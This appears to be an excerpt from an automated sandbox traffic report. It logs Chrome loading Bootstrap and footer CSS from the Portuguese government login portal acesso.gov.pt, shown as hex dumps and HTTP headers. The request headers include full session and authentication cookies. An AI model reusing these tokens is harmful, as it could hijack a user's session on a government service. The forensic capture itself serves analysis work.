                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 74 68 65 61 64 20 3e 20 74 72 20 3e 20 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 3e 20 74 62 6f 64 79 20 3e 20 74 72 20 3e 20 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 3e 20 74 66 6f 6f 74 20 3e 20 74 72 20 3e 20 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 3e 20 74 68 65 61 64 20 3e 20 74 72 20 3e 20 74 64 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65
                                                                                                                  Data Ascii: thead > tr > th:last-child, .table-responsive > .table-bordered > tbody > tr > th:last-child, .table-responsive > .table-bordered > tfoot > tr > th:last-child, .table-responsive > .table-bordered > thead > tr > td:last-child, .table-re
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 0d 0a 2e 62 74 6e 2d 64 65 66 61 75 6c 74 2e 61 63 74 69 76 65 2c 0d 0a 2e 6f 70 65 6e 20 3e 20 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 62 74 6e 2d 64 65 66 61 75 6c 74 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 35 32 34 66 34 66 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 64 34 64 39 64 63 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 63 62 33 62 36 3b 0d 0a 7d 0d 0a 2e 62 74 6e 2d 64 65 66 61 75 6c 74 3a 61 63 74 69 76 65 2c 0d 0a 2e 62 74 6e 2d 64 65 66 61 75 6c 74 2e 61 63 74 69 76 65 2c 0d 0a 2e 6f 70 65 6e 20 3e 20 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 62 74 6e 2d 64 65 66 61 75 6c 74 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e
                                                                                                                  Data Ascii: .btn-default.active,.open > .dropdown-toggle.btn-default { color: #524f4f; background-color: #d4d9dc; border-color: #acb3b6;}.btn-default:active,.btn-default.active,.open > .dropdown-toggle.btn-default { background-image: n
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 79 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 62 6c 6f 63 6b 2c 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2e 62 74 6e 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 2e 62 74 6e 2d 67 72 6f 75 70 2d 72 65 73 70 6f 6e 73 69 76 65 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 62 74 6e 2d 67 72 6f 75 70 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 61 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67
                                                                                                                  Data Ascii: ype="reset"].btn-block,input[type="button"].btn-block { width: 100%;}.btn-group-responsive { display: none;}.btn-group .dropdown-menu > li > a { text-transform: uppercase; font-weight: bold; font-size: 12px; padding
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 0a 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 20 3e 20 6c 69 20 7b 0d 0a 20 20 20 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 20 3e 20 6c 69 20 3e 20 61 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0d 0a 7d 0d 0a 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 20 3e 20 2e 64 72 6f 70 64 6f 77 6e 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 7b 0d 0a 20 20 20 20 74 6f 70 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 7d 0d 0a 40 6d 65 64 69 61 20 28 6d 69
                                                                                                                  Data Ascii: .nav-justified { width: 100%;}.nav-justified > li { float: none;}.nav-justified > li > a { text-align: center; margin-bottom: 5px;}.nav-justified > .dropdown .dropdown-menu { top: auto; left: auto;}@media (mi
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 20 3e 20 6c 69 20 3e 20 61 3a 68 6f 76 65 72 2c 0d 0a 2e 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 73 70 61 6e 3a 68 6f 76 65 72 2c 0d 0a 2e 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 61 3a 66 6f 63 75 73 2c 0d 0a 2e 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 73 70 61 6e 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 36 33 39 39 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 38 34 63 63 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 32 70 78 20 35 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 35 29 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 32 70 78
                                                                                                                  Data Ascii: > li > a:hover,.pagination > li > span:hover,.pagination > li > a:focus,.pagination > li > span:focus { color: #006399; border-color: #0084cc; z-index: 1; -webkit-box-shadow: 0 2px 5px rgba(0, 0, 0, 0.15); box-shadow: 0 2px
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 72 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 68 65 61 64 69 6e 67 20 3e 20 2e 73 6d 61 6c 6c 2c 0d 0a 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 68 65 61 64 69 6e 67 20 3e 20 2e 73 6d 61 6c 6c 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 7d 0d 0a 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 74 65 78 74 2c 0d 0a 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 3a 68 6f 76 65 72 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 74 65 78 74 2c 0d 0a 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 3a
                                                                                                                  Data Ascii: r .list-group-item-heading > .small,.list-group-item.active:focus .list-group-item-heading > .small { color: inherit;}.list-group-item.active .list-group-item-text,.list-group-item.active:hover .list-group-item-text,.list-group-item.active:
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 7d 0d 0a 2e 70 61 6e 65 6c 2d 70 72 69 6d 61 72 79 2d 61 6c 74 20 3e 20 2e 70 61 6e 65 6c 2d 66 6f 6f 74 65 72 20 2b 20 2e 70 61 6e 65 6c 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 70 61 6e 65 6c 2d 62 6f 64 79 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 20 23 64 64 64 3b 0d 0a 7d 0d 0a 2e 70 61 6e 65 6c 2d 64 61 6e 67 65 72 2d 61 6c 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 64 64 64 3b 0d 0a 7d 0d 0a 2e 70 61 6e 65 6c 2d 64 61 6e 67 65 72 2d 61 6c 74 20 3e 20 2e 70 61 6e 65 6c 2d 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 30 37 35 35 46 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72
                                                                                                                  Data Ascii: }.panel-primary-alt > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #ddd;}.panel-danger-alt { border-color: #ddd;}.panel-danger-alt > .panel-heading { color: #fff; background-color: #F0755F; border


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.44973962.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:52 UTC1148OUTGET /autentica_static/css/bootstrap.min.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:52 UTC363INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 117154
                                                                                                                  2024-11-14 13:59:52 UTC16021INData Raw: 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 32 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 32 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73
                                                                                                                  Data Ascii: /*! * Bootstrap v3.3.2 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-s
                                                                                                                  2024-11-14 13:59:52 UTC16384INData Raw: 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 35 37 31 34 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 69 6d 67 2d 63 69
                                                                                                                  Data Ascii: isplay:inline-block;max-width:100%;height:auto;padding:4px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.img-ci
                                                                                                                  2024-11-14 13:59:52 UTC363INData Raw: 74 62 6f 64 79 3e 74 72 3e 74 64 2e 69 6e 66 6f 3a 68 6f 76 65 72 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 3e 74 68 2e 69 6e 66 6f 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 34 65 33 66 33 7d 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 2e 77 61 72 6e 69 6e 67 3e 74 64 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 2e 77 61 72 6e 69 6e 67 3e 74 68 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 3e 74 64 2e 77 61 72 6e 69 6e 67 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 3e 74 68 2e 77 61 72 6e 69 6e 67 2c 2e 74 61 62 6c 65 3e 74 66 6f 6f 74 3e 74 72 2e 77 61 72 6e 69 6e 67 3e 74 64 2c 2e 74 61 62 6c 65 3e 74 66 6f 6f 74 3e 74 72 2e 77 61 72 6e 69 6e 67 3e 74 68 2c 2e 74 61 62 6c 65 3e 74 66
                                                                                                                  Data Ascii: tbody>tr>td.info:hover,.table-hover>tbody>tr>th.info:hover{background-color:#c4e3f3}.table>tbody>tr.warning>td,.table>tbody>tr.warning>th,.table>tbody>tr>td.warning,.table>tbody>tr>th.warning,.table>tfoot>tr.warning>td,.table>tfoot>tr.warning>th,.table>tf
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 65 61 64 3e 74 72 3e 74 64 2e 77 61 72 6e 69 6e 67 2c 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 68 2e 77 61 72 6e 69 6e 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 2e 77 61 72 6e 69 6e 67 3a 68 6f 76 65 72 3e 74 64 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 2e 77 61 72 6e 69 6e 67 3a 68 6f 76 65 72 3e 74 68 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 3a 68 6f 76 65 72 3e 2e 77 61 72 6e 69 6e 67 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 3e 74 64 2e 77 61 72 6e 69 6e 67 3a 68 6f 76 65 72 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 3e 74 68 2e 77 61 72 6e 69 6e
                                                                                                                  Data Ascii: ead>tr>td.warning,.table>thead>tr>th.warning{background-color:#fcf8e3}.table-hover>tbody>tr.warning:hover>td,.table-hover>tbody>tr.warning:hover>th,.table-hover>tbody>tr:hover>.warning,.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warnin
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 69 6e 66 6f 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 69 6e 66 6f 2e 61 63 74 69 76 65 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 69 6e 66 6f 2e 66 6f 63 75 73 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 69 6e 66 6f 3a 61 63 74 69 76 65 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 69 6e 66 6f 3a 66 6f 63 75 73 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 69 6e 66 6f 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 62 63 30 64 65 3b 62 6f 72 64 65 72 2d 63
                                                                                                                  Data Ascii: disabled]:hover,fieldset[disabled] .btn-info,fieldset[disabled] .btn-info.active,fieldset[disabled] .btn-info.focus,fieldset[disabled] .btn-info:active,fieldset[disabled] .btn-info:focus,fieldset[disabled] .btn-info:hover{background-color:#5bc0de;border-c
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 62 2d 63 6f 6e 74 65 6e 74 3e 2e 61 63 74 69 76 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 6e 61 76 2d 74 61 62 73 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6e 61 76 62 61 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 35 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70
                                                                                                                  Data Ascii: b-content>.active{display:block;visibility:visible}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.navbar{position:relative;min-height:50px;margin-bottom:20px;border:1px solid transparent}@media (min-width:768p
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 6c 65 72 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 32 34 35 32 36 39 7d 2e 61 6c 65 72 74 2d 77 61 72 6e 69 6e 67 7b 63 6f 6c 6f 72 3a 23 38 61 36 64 33 62 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 61 65 62 63 63 7d 2e 61 6c 65 72 74 2d 77 61 72 6e 69 6e 67 20 68 72 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 66 37 65 31 62 35 7d 2e 61 6c 65 72 74 2d 77 61 72 6e 69 6e 67 20 2e 61 6c 65 72 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 36 36 35 31 32 63 7d 2e 61 6c 65 72 74 2d 64 61 6e 67 65 72 7b 63 6f 6c 6f 72 3a 23 61 39 34 34 34 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 64 65 64 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 62 63 63 64
                                                                                                                  Data Ascii: lert-link{color:#245269}.alert-warning{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}.alert-warning hr{border-top-color:#f7e1b5}.alert-warning .alert-link{color:#66512c}.alert-danger{color:#a94442;background-color:#f2dede;border-color:#ebccd
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 61 64 3e 74 72 3a 66 69 72 73 74 2d 63 68 69 6c 64 3e 74 68 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 62 6f 64 79 3e 74 72 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 74 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 62 6f 64 79 3e 74 72 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 74 68 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 66 6f 6f 74 3e 74 72 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 74 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 66 6f 6f 74 3e 74 72 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 74 68 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 2d 62 6f
                                                                                                                  Data Ascii: ad>tr:first-child>th{border-bottom:0}.panel>.table-bordered>tbody>tr:last-child>td,.panel>.table-bordered>tbody>tr:last-child>th,.panel>.table-bordered>tfoot>tr:last-child>td,.panel>.table-bordered>tfoot>tr:last-child>th,.panel>.table-responsive>.table-bo
                                                                                                                  2024-11-14 13:59:53 UTC2466INData Raw: 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 76 69 73 69 62 6c 65 2d 78 73 2d 69 6e 6c 69 6e 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 76 69 73 69 62 6c 65 2d 78 73 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 2e 76 69 73 69 62 6c 65 2d 73 6d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 74 61 62 6c 65 2e 76 69 73 69 62 6c 65 2d 73 6d 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c
                                                                                                                  Data Ascii: ax-width:767px){.visible-xs-inline{display:inline!important}}@media (max-width:767px){.visible-xs-inline-block{display:inline-block!important}}@media (min-width:768px) and (max-width:991px){.visible-sm{display:block!important}table.visible-sm{display:tabl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.44974262.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:52 UTC1144OUTGET /autentica_static/pf/css/footer.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:52 UTC363INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 3511
